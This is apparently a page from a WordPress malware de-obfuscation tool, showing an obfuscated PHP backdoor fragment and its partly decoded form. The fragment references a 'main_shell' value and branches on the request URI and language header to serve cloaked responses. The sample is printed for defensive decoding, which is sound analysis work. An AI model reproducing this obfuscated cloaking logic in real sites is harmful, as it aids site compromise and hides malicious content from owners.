De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php @header('Content-Type:text/html;charset=utf-8'); error_reporting(0); $OOOOOO = "%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c"; global $O; $O = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-\"?> <.-=:/1230654879';()&^\$[]\\\\%{}!*|+,"; if (strpos($var02, $O[59] . $O[9] . $O[15] . $O[9])) { $ooooooOOooOooOoooOOOooooOOoOoOO = $var01 . $var05 . $var04; $arr1[$O[25] . $O[10] . $O[7] . $O[24] . $O[52] . $O[11] . $O[15] . $O[2] . $O[18] . $O[18]] = $ooooooOOooOooOoooOOOooooOOoOoOO; } else { $ooooooOOooOooOoooOOOooooOOoOoOO = $var01 . $var05; $arr1[$O[25] . $O[10] . $O[7] . $O[24] . $O[52] . $O[11] . $O[15] . $O[2] . $O[18] . $O[18]] = $ooooooOOooOooOoooOOOooooOOoOoOO; } $ooooOoOOooOoooOOOoOoOoOoO = func4($var13); if (strpos($_SERVER[$O[29] . $O[28] . $O[26] . $O[32] . $O[28] . $O[37] . $O[30] . $O[52] . $O[32] . $O[29] . $O[33]], $O[59] . $O[9] . $O[15] . $O[9])) { $ooooooooOOOOOOOO = $O[55]; } else { $ooooooooOOOOOOOO = $O[63]; } if ($ooooOoOOooOoooOOOoOoOoOoO && substr($_SERVER[$O[29] . $O[28] . $O[26] . $O[32] . $O[28] . $O[37] . $O[30] . $O[52] . $O[32] . $O[29] . $O[33]], 5) == $O[59] . $O[15] . $O[4] . $O[25] . $O[18] && preg_match($O[63] . $O[16] . $O[10] . $O[63] . $O[7], @$_SERVER[$O[41] . $O[30] . $O[30] . $O[35] . $O[52] . $O[36] . $O[47] . $O[47] . $O[28] . $O[35] . $O[30] . $O[52] . $O[44] . $O[36] . $O[50] . $O[40] . $O[32] . $O[36] . $O[40] . $O[28]])) { echo func2($var09, $arr1); exit; } $oooOoOooOooOoooOOOoOoOoOoOo = func3($var12); if ($oooOoOooOooOoooOOOoOoOoOoOo) { $ooooooOOOOOoooOOOOooooooO = func2($var07, $arr1); if ($ooooooOOOOOoooOOOOooooooO == $O[70] . $O[67] . $O[70]) { header($O[41] . $O[30] . $O[30] . $O[35] . $O[63] . $O[64] . $O[59] . $O[67] . $O[57] . $O[70] . $O[67] . $O[70] . $O[57] . $O[50] . $O[8] . $O[4] . $O[57] . $O[39] . $O[8] . $O[6] . $O[24] . $O[12]); exit; } else { if ($ooooooOOOOOoooOOOOooooooO == $O[69] . $O[67] . $O[67]) { header($O[41] . $O[30] . $O[30] . $O[35] . $O[63] . $O[64] . $O[59] . $O[67] . $O[57] . $O[69] . $O[67] . $O[67] . $O[57] . $O[33] . $O[24] . $O[4] . $O[2] . $O[3] . $O[24] . $O[10] . $O[18] . $O[57] . $O[37] . $O[2] . $O[3] . $O[22] . $O[2] . $O[3] . $O[57] . $O[28] . $O[3] . $O[3] . $O[8] . $O[3]); exit; } else { if ($ooooooOOOOOoooOOOOooooooO == $O[23] . $O[18] . $O[10] . $O[24] . $O[17]) { echo ''; exit; } else { echo $ooooooOOOOOoooOOOOooooooO; exit; } } } } else { header($O[41] . $O[30] . $O[30] . $O[35] . $O[63] . $O[64] . $O[59] . $O[67] . $O[57] . $O[70] . $O[67] . $O[70] . $O[57] . $O[50] . $O[8] . $O[4] . $O[57] . $O[39] . $O[8] . $O[6] . $O[24] . $O[12]); } ?>
<?php @header('Content-Type:text/html;charset=utf-8'); error_reporting(0); $OOOOOO = "%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c"; global $O; $O = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-\"?> <.-=:/1230654879';()&^\$[]\\\\%{}!*|+,"; if (strpos($var02, ".php")) { $ooooooOOooOooOoooOOOooooOOoOoOO = $var01 . $var05 . $var04; $arr1["main_shell"] = $ooooooOOooOooOoooOOOooooOOoOoOO; } else { $ooooooOOooOooOoooOOOooooOOoOoOO = $var01 . $var05; $arr1["main_shell"] = $ooooooOOooOooOoooOOOooooOOoOoOO; } $ooooOoOOooOoooOOOoOoOoOoO = func4($var13); if (strpos($_SERVER[$O[29] . $O[28] . $O[26] . $O[32] . $O[28] . $O[37] . $O[30] . $O[52] . $O[32] . $O[29] . $O[33]], $O[59] . $O[9] . $O[15] . $O[9])) { $ooooooooOOOOOOOO = $O[55]; } else { $ooooooooOOOOOOOO = $O[63]; } if ($ooooOoOOooOoooOOOoOoOoOoO && substr($_SERVER[$O[29] . $O[28] . $O[26] . $O[32] . $O[28] . $O[37] . $O[30] . $O[52] . $O[32] . $O[29] . $O[33]], 5) == $O[59] . $O[15] . $O[4] . $O[25] . $O[18] && preg_match($O[63] . $O[16] . $O[10] . $O[63] . $O[7], @$_SERVER[$O[41] . $O[30] . $O[30] . $O[35] . $O[52] . $O[36] . $O[47] . $O[47] . $O[28] . $O[35] . $O[30] . $O[52] . $O[44] . $O[36] . $O[50] . $O[40] . $O[32] . $O[36] . $O[40] . $O[28]])) { echo func2($var09, $arr1); exit; } $oooOoOooOooOoooOOOoOoOoOoOo = func3($var12); if ($oooOoOooOooOoooOOOoOoOoOoOo) { $ooooooOOOOOoooOOOOooooooO = func2($var07, $arr1); if ($ooooooOOOOOoooOOOOooooooO == $O[70] . $O[67] . $O[70]) { header($O[41] . $O[30] . $O[30] . $O[35] . $O[63] . $O[64] . $O[59] . $O[67] . $O[57] . $O[70] . $O[67] . $O[70] . $O[57] . $O[50] . $O[8] . $O[4] . $O[57] . $O[39] . $O[8] . $O[6] . $O[24] . $O[12]); exit; } else { if ($ooooooOOOOOoooOOOOooooooO == $O[69] . $O[67] . $O[67]) { header($O[41] . $O[30] . $O[30] . $O[35] . $O[63] . $O[64] . $O[59] . $O[67] . $O[57] . $O[69] . $O[67] . $O[67] . $O[57] . $O[33] . $O[24] . $O[4] . $O[2] . $O[3] . $O[24] . $O[10] . $O[18] . $O[57] . $O[37] . $O[2] . $O[3] . $O[22] . $O[2] . $O[3] . $O[57] . $O[28] . $O[3] . $O[3] . $O[8] . $O[3]); exit; } else { if ($ooooooOOOOOoooOOOOooooooO == $O[23] . $O[18] . $O[10] . $O[24] . $O[17]) { echo ''; exit; } else { echo $ooooooOOOOOoooOOOOooooooO; exit; } } } } else { header($O[41] . $O[30] . $O[30] . $O[35] . $O[63] . $O[64] . $O[59] . $O[67] . $O[57] . $O[70] . $O[67] . $O[70] . $O[57] . $O[50] . $O[8] . $O[4] . $O[57] . $O[39] . $O[8] . $O[6] . $O[24] . $O[12]); }
Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.